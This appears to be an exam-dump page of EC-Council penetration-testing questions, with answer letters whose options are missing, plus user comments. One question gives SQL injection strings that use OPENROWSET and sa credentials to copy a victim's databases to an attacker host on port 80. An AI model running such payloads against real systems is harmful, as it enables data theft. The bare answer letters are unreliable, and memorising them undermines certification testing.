Which of the following approaches to vulnerability assessment relies on the administrator providing baseline of system configuration and then scanning continuously without incorporating any information found at the time of scanning?
Answer(s): C
http://www.netsense.info/downloads/security_wp_mva.pdf (page 12, tree-based assessment technology, second para)
Today, most organizations would agree that their most valuable IT assets reside within applications and databases. Most would probably also agree that these are areas that have the weakest levels of security, thus making them the prime target for malicious activity from system administrators, DBAs, contractors, consultants, partners, and customers.Which of the following flaws refers to an application using poorly written encryption code to securely encrypt and store sensitive data in the database and allows an attacker to steal or modify weakly protected data such as credit card numbers, SSNs, and other authentication credentials?
Answer(s): B
A penetration tester tries to transfer the database from the target machine to a different machine. For this, he uses OPENROWSET to link the target database to his own database, replicates the database structure, and transfers the data to his machine by via a connection to the remote machine on port 80.The query he used to transfer databases was:'; insert into OPENROWSET('SQLoledb', 'uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP, 80;', 'select * from mydatabase..hacked_sysdatabases') select * from master.dbo.sysdatabases The query he used to transfer table 1 was:'; insert into OPENROWSET('SQLoledb', 'uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP, 80;', 'select * frommydatabase..table1') select * from database..table1 What query does he need in order to transfer the column?
Packet filtering firewalls are usually a part of a router. In a packet filtering firewall, each packet is compared to a set of criteria before it is forwarded.Depending on the packet and the criteria, the firewall can:i). Drop the packetii). Forward it or send a message to the originatorAt which level of the OSI model do the packet filtering firewalls work?
Answer(s): D
http://books.google.com.pk/books?id=KPjLAyA7HgoC&pg=PA208&lpg=PA208&dq=At+whi ch+level+of+the+OSI+model+do+the+packet+filtering+firewalls+work&source=bl&ots=zRrb cmY3pj&sig=I3vuS3VA7r-3VF8lC6xq_c_r31M&hl=en&sa=X&ei=wMcfVMetI8HPaNSRgPgD&ved=0CC8Q6AEwAg#v=onepage&q=At%20which%20level%20of%20the%20OSI%20model%20do%20the%20pa cket%20filtering%20firewalls%20work&f=false (packet filters)
An antenna is a device that is designed to transmit and receive the electromagnetic waves that are generally called radio waves. Which one of the following types of antenna is developed from waveguide technology?
Firewall and DMZ architectures are characterized according to its design. Which one of the following architectures is used when routers have better high-bandwidth data stream handling capacity?
Answer(s): A
Which one of the following tools of trade is a commercial shellcode and payload generator written in Python by Dave Aitel?
Internet Control Message Protocol (ICMP) messages occur in many situations, such as whenever a datagram cannot reach the destination or the gateway does not have the buffering capacity to forward a datagram. Each ICMP message contains three fields: type, code, and checksum. Different types of Internet Control Message Protocols (ICMPs) are identified by a TYPE field. If the destination is not reachable, which one of the following are generated?
Share your comments for EC-Council 412-79V9 exam with other users:
helpful dump questions
question 423 eigrp uses metric
hello nice dumps
good resource for learning
very useful
physical tempering techniques
its giving best technical knowledge
please upload
great question with explanation thanks!!
does this exam have lab sections?
please upload the braindump for .net
i need this exam 1z0-1107-2. please.
very useful!
for this question - "which three type of basic patient or member information is displayed on the patient info component? (choose three.)", list of conditions is not displayed (it is displayed in patient card, not patient info). so should be thumbnail of chatter photo
q52 should be d. vm storage controller bandwidth represents the amount of data (in terms of bandwidth) that a vms storage controller is using to read and write data to the storage fabric.
nice questions
question # 208: failure logs is not an example of operational metadata.
good questions
thank you for the test materials!
its very helpful
good questons
i need the dumb of the hcip security v4.0 exam
upload the dump please
yes, iam looking this
please upload cima e2 managing performance dumps
wonderful questions
i used this site since 2000, still great to support my career
why is the answer to "which of the following is required by scrum?" all of the following stated below since most of them are not mandatory? sprint retrospective. members must be stand up at the daily scrum. sprint burndown chart. release planning.
great job. hope this helps out.
upload please. many thanks!
this is so interesting